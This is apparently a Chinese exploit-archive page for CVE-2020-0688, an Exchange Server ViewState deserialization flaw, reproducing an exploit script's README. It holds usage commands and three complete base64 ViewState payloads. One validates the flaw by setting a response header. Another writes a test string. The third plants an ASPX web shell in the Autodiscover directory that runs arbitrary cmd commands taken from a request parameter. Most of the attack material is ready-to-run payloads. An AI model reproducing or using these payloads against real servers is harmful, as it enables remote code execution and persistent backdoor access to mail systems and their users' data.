关联漏洞
标题:
Microsoft Exchange Server 授权问题漏洞
(CVE-2020-0688)
描述:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server 中存在授权问题漏洞,该漏洞源于程序无法正确处理内存中的对象。攻击者可借助特制的电子邮件利用该漏洞在系统用户的上下文中运行任意代码。以下产品及版本受到影响:Microsoft Exchange Server 2010,Microsoft Exchange Server 2013,Micro
描述
Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"
介绍
# CVE-2020-0688
Exploitation Script for CVE-2020-0688 "Microsoft Exchange default MachineKeySection deserialize vulnerability"
## Usage:
```
powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml <XAML PATH> -uri <default|liveiderror|...>
```
## Example:
This is an example of vulnerability validation by seting header in response.
```
powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml Set-Header.xml -uri default
__VIEWSTATEGENERATOR=
B97B4E27
__VIEWSTATE=
/wEy4AkAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACCCDxSZXNvdXJjZURpY3Rpb25hcnkgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgDQogICAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiIA0KICAgIHhtbG5zOnM9ImNsci1uYW1lc3BhY2U6U3lzdGVtO2Fzc2VtYmx5PW1zY29ybGliIiANCiAgICB4bWxuczp3PSJjbHItbmFtZXNwYWNlOlN5c3RlbS5XZWI7YXNzZW1ibHk9U3lzdGVtLldlYiI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9ImEiIE9iamVjdEluc3RhbmNlPSJ7eDpTdGF0aWMgdzpIdHRwQ29udGV4dC5DdXJyZW50fSIgTWV0aG9kTmFtZT0iIj48L09iamVjdERhdGFQcm92aWRlcj4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iYiIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBhfSIgTWV0aG9kTmFtZT0iZ2V0X1Jlc3BvbnNlIj48L09iamVjdERhdGFQcm92aWRlcj4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iYyIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBifSIgTWV0aG9kTmFtZT0iZ2V0X0hlYWRlcnMiPjwvT2JqZWN0RGF0YVByb3ZpZGVyPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJkIiBPYmplY3RJbnN0YW5jZT0ie1N0YXRpY1Jlc291cmNlIGN9IiBNZXRob2ROYW1lPSJBZGQiPg0KICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgIDxzOlN0cmluZz5URVNULUhFQURFUjwvczpTdHJpbmc+DQogICAgICA8czpTdHJpbmc+UmF2aW5BY2FkZW15PC9zOlN0cmluZz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICA8L09iamVjdERhdGFQcm92aWRlcj4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iZSIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBifSIgTWV0aG9kTmFtZT0iRW5kIj48L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgsmMAD8uTn0dD7/75sv25RCgZzaIQ==
```
This is an example of vulnerability validation by seting string in response.
```
powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml Set-Response.xml -uri default
__VIEWSTATEGENERATOR=
B97B4E27
__VIEWSTATE=
/wEyxwgAAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADpBjxSZXNvdXJjZURpY3Rpb25hcnkgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgDQogICAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiIA0KICAgIHhtbG5zOnM9ImNsci1uYW1lc3BhY2U6U3lzdGVtO2Fzc2VtYmx5PW1zY29ybGliIiANCiAgICB4bWxuczp3PSJjbHItbmFtZXNwYWNlOlN5c3RlbS5XZWI7YXNzZW1ibHk9U3lzdGVtLldlYiI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9ImEiIE9iamVjdEluc3RhbmNlPSJ7eDpTdGF0aWMgdzpIdHRwQ29udGV4dC5DdXJyZW50fSIgTWV0aG9kTmFtZT0iIj48L09iamVjdERhdGFQcm92aWRlcj4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iYiIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBhfSIgTWV0aG9kTmFtZT0iZ2V0X1Jlc3BvbnNlIj48L09iamVjdERhdGFQcm92aWRlcj4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iYyIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBifSIgTWV0aG9kTmFtZT0iV3JpdGUiPg0KICAgICAgPE9iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICAgICAgPHM6U3RyaW5nPlJBVklOQUNBRE1ZPC9zOlN0cmluZz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICA8L09iamVjdERhdGFQcm92aWRlcj4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iZSIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBifSIgTWV0aG9kTmFtZT0iRW5kIj48L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5PgtlS34OId/SqujzElQ7KDitWUhWwA==
```
This is an example for uploading shell by LiveIdError.aspx.
```
powershell -exec bypass -file .\CVE-2020-0688.ps1 -xaml Upload-Shell.xml -uri liveiderror __VIEWSTATEGENERATOR=
31563A0D
__VIEWSTATE=
/wEy5x4AAQAAAP////8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAACJHTxSZXNvdXJjZURpY3Rpb25hcnkgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgICB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCIgDQogICAgeG1sbnM6cz0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogICAgeG1sbnM6dz0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uV2ViO2Fzc2VtYmx5PVN5c3RlbS5XZWIiPg0KICA8czpTdHJpbmcgeDpLZXk9ImEiIHg6RmFjdG9yeU1ldGhvZD0iczpFbnZpcm9ubWVudC5HZXRFbnZpcm9ubWVudFZhcmlhYmxlIiB4OkFyZ3VtZW50cz0iRXhjaGFuZ2VJbnN0YWxsUGF0aCIvPg0KICA8czpTdHJpbmcgeDpLZXk9ImIiIHg6RmFjdG9yeU1ldGhvZD0iQ29uY2F0Ij4NCiAgICA8eDpBcmd1bWVudHM+DQogICAgICA8U3RhdGljUmVzb3VyY2UgUmVzb3VyY2VLZXk9ImEiLz4NCiAgICAgIDxzOlN0cmluZz5DbGllbnRBY2Nlc3NcXEF1dG9kaXNjb3ZlclxcUmF2aW4uYXNweDwvczpTdHJpbmc+DQogICAgPC94OkFyZ3VtZW50cz4NCiAgPC9zOlN0cmluZz4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0ieCIgT2JqZWN0VHlwZT0ie3g6VHlwZSBzOklPLkZpbGV9IiBNZXRob2ROYW1lPSJXcml0ZUFsbFRleHQiPg0KICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgIDxTdGF0aWNSZXNvdXJjZSBSZXNvdXJjZUtleT0iYiIvPg0KICAgICAgPHM6U3RyaW5nPiZsdDslQHBhZ2UgbGFuZ3VhZ2U9JnF1b3Q7QyMmcXVvdDslJmd0Ow0KDQombHQ7JUAgaW1wb3J0IE5hbWVzcGFjZT0mcXVvdDtTeXN0ZW0uSU8mcXVvdDslJmd0Ow0KDQombHQ7JUAgaW1wb3J0IE5hbWVzcGFjZT0mcXVvdDtTeXN0ZW0uWG1sJnF1b3Q7JSZndDsNCg0KJmx0OyVAIGltcG9ydCBOYW1lc3BhY2U9JnF1b3Q7U3lzdGVtLlhtbC5Yc2wmcXVvdDslJmd0Ow0KDQombHQ7JQ0Kc3RyaW5nIHhtbD1AJnF1b3Q7Jmx0Oz94bWwgdmVyc2lvbj0mcXVvdDsmcXVvdDsxLjAmcXVvdDsmcXVvdDs/Jmd0OyZsdDtyb290Jmd0O3Rlc3QmbHQ7L3Jvb3QmZ3Q7JnF1b3Q7Ow0Kc3RyaW5nIHhzbHQ9QCZxdW90OyZsdDs/eG1sIHZlcnNpb249JzEuMCc/Jmd0Ow0KJmx0O3hzbDpzdHlsZXNoZWV0IHZlcnNpb249JnF1b3Q7JnF1b3Q7MS4wJnF1b3Q7JnF1b3Q7IHhtbG5zOnhzbD0mcXVvdDsmcXVvdDtodHRwOi8vd3d3LnczLm9yZy8xOTk5L1hTTC9UcmFuc2Zvcm0mcXVvdDsmcXVvdDsgeG1sbnM6bXN4c2w9JnF1b3Q7JnF1b3Q7dXJuOnNjaGVtYXMtbWljcm9zb2Z0LWNvbTp4c2x0JnF1b3Q7JnF1b3Q7IHhtbG5zOnpjZz0mcXVvdDsmcXVvdDt6Y2dvbnZoJnF1b3Q7JnF1b3Q7Jmd0Ow0KICAgICZsdDttc3hzbDpzY3JpcHQgbGFuZ3VhZ2U9JnF1b3Q7JnF1b3Q7SlNjcmlwdCZxdW90OyZxdW90OyBpbXBsZW1lbnRzLXByZWZpeD0mcXVvdDsmcXVvdDt6Y2cmcXVvdDsmcXVvdDsmZ3Q7DQogICAgJmx0O21zeHNsOmFzc2VtYmx5IG5hbWU9JnF1b3Q7JnF1b3Q7bXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JnF1b3Q7JnF1b3Q7LyZndDsNCiAgICAmbHQ7bXN4c2w6YXNzZW1ibHkgbmFtZT0mcXVvdDsmcXVvdDtTeXN0ZW0uRGF0YSwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkmcXVvdDsmcXVvdDsvJmd0Ow0KICAgICZsdDttc3hzbDphc3NlbWJseSBuYW1lPSZxdW90OyZxdW90O1N5c3RlbS5Db25maWd1cmF0aW9uLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YjAzZjVmN2YxMWQ1MGEzYSZxdW90OyZxdW90Oy8mZ3Q7DQogICAgJmx0O21zeHNsOmFzc2VtYmx5IG5hbWU9JnF1b3Q7JnF1b3Q7U3lzdGVtLldlYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EmcXVvdDsmcXVvdDsvJmd0Ow0KICAgICAgICAmbHQ7IVtDREFUQVtmdW5jdGlvbiB4bWwoKXsNCiAgICAgICAgdmFyIGM9U3lzdGVtLldlYi5IdHRwQ29udGV4dC5DdXJyZW50O3ZhciBSZXF1ZXN0PWMuUmVxdWVzdDt2YXIgUmVzcG9uc2U9Yy5SZXNwb25zZTsNCiAgICAgICAgdmFyIGNvbW1hbmQgPSBSZXF1ZXN0Lkl0ZW1bJ2NtZCddOw0KICAgICAgICB2YXIgciA9IG5ldyBBY3RpdmVYT2JqZWN0KCZxdW90OyZxdW90O1dTY3JpcHQuU2hlbGwmcXVvdDsmcXVvdDspLkV4ZWMoJnF1b3Q7JnF1b3Q7Y21kIC9jICZxdW90OyZxdW90Oytjb21tYW5kKTsNCiAgICAgICAgdmFyIE91dFN0cmVhbSA9IHIuU3RkT3V0Ow0KICAgICAgICB2YXIgU3RyID0gJnF1b3Q7JnF1b3Q7JnF1b3Q7JnF1b3Q7Ow0KICAgICAgICB3aGlsZSAoIU91dFN0cmVhbS5hdEVuZE9mU3RyZWFtKSB7DQogICAgICAgICAgICBTdHIgPSBTdHIgKyBPdXRTdHJlYW0ucmVhZEFsbCgpOw0KICAgICAgICAgICAgfQ0KICAgICAgICBSZXNwb25zZS5Xcml0ZSgmcXVvdDsmcXVvdDsmbHQ7cHJlJmd0OyZxdW90OyZxdW90OytTdHIrJnF1b3Q7JnF1b3Q7Jmx0Oy9wcmUmZ3Q7JnF1b3Q7JnF1b3Q7KTsNCiAgICAgICAgfV1dJmd0Ow0KICAgICZsdDsvbXN4c2w6c2NyaXB0Jmd0Ow0KJmx0O3hzbDp0ZW1wbGF0ZSBtYXRjaD0mcXVvdDsmcXVvdDsvcm9vdCZxdW90OyZxdW90OyZndDsNCiAgICAmbHQ7eHNsOnZhbHVlLW9mIHNlbGVjdD0mcXVvdDsmcXVvdDt6Y2c6eG1sKCkmcXVvdDsmcXVvdDsvJmd0Ow0KJmx0Oy94c2w6dGVtcGxhdGUmZ3Q7DQombHQ7L3hzbDpzdHlsZXNoZWV0Jmd0OyZxdW90OzsNClhtbERvY3VtZW50IHhtbGRvYz1uZXcgWG1sRG9jdW1lbnQoKTsNCnhtbGRvYy5Mb2FkWG1sKHhtbCk7DQpYbWxEb2N1bWVudCB4c2xkb2M9bmV3IFhtbERvY3VtZW50KCk7DQp4c2xkb2MuTG9hZFhtbCh4c2x0KTsNClhzbHRTZXR0aW5ncyB4c2x0X3NldHRpbmdzID0gbmV3IFhzbHRTZXR0aW5ncyhmYWxzZSwgdHJ1ZSk7DQp4c2x0X3NldHRpbmdzLkVuYWJsZVNjcmlwdCA9IHRydWU7DQp0cnl7DQogICAgWHNsQ29tcGlsZWRUcmFuc2Zvcm0geGN0PW5ldyBYc2xDb21waWxlZFRyYW5zZm9ybSgpOw0KICAgIHhjdC5Mb2FkKHhzbGRvYyx4c2x0X3NldHRpbmdzLG5ldyBYbWxVcmxSZXNvbHZlcigpKTsNCiAgICB4Y3QuVHJhbnNmb3JtKHhtbGRvYyxudWxsLG5ldyBNZW1vcnlTdHJlYW0oKSk7DQp9DQpjYXRjaCAoRXhjZXB0aW9uIGUpew0KICAgIFJlc3BvbnNlLldyaXRlKCZxdW90O0Vycm9yJnF1b3Q7KTsNCn0NCiUmZ3Q7DQo8L3M6U3RyaW5nPg0KICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM+DQogIDwvT2JqZWN0RGF0YVByb3ZpZGVyPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJjIiBPYmplY3RJbnN0YW5jZT0ie3g6U3RhdGljIHc6SHR0cENvbnRleHQuQ3VycmVudH0iIE1ldGhvZE5hbWU9IiIvPg0KICA8T2JqZWN0RGF0YVByb3ZpZGVyIHg6S2V5PSJkIiBPYmplY3RJbnN0YW5jZT0ie1N0YXRpY1Jlc291cmNlIGN9IiBNZXRob2ROYW1lPSJnZXRfUmVzcG9uc2UiLz4NCiAgPE9iamVjdERhdGFQcm92aWRlciB4OktleT0iZSIgT2JqZWN0SW5zdGFuY2U9IntTdGF0aWNSZXNvdXJjZSBkfSIgTWV0aG9kTmFtZT0iRW5kIi8+DQo8L1Jlc291cmNlRGljdGlvbmFyeT4LfsfNBBf2KLz18AunP/sNrNcKUMM=
```
文件快照
[4.0K] /data/pocs/9251a069ca408123d7cc51c02aa467b6c5c5c138
├── [3.9K] CVE-2020-0688.ps1
├── [1.3M] Microsoft.PowerShell.Editor.dll
├── [1.1K] NULL-File.xml
├── [9.3K] README.md
├── [1.0K] Set-Header.xml
├── [ 873] Set-Response.xml
└── [3.6K] Upload-Shell.xml
0 directories, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。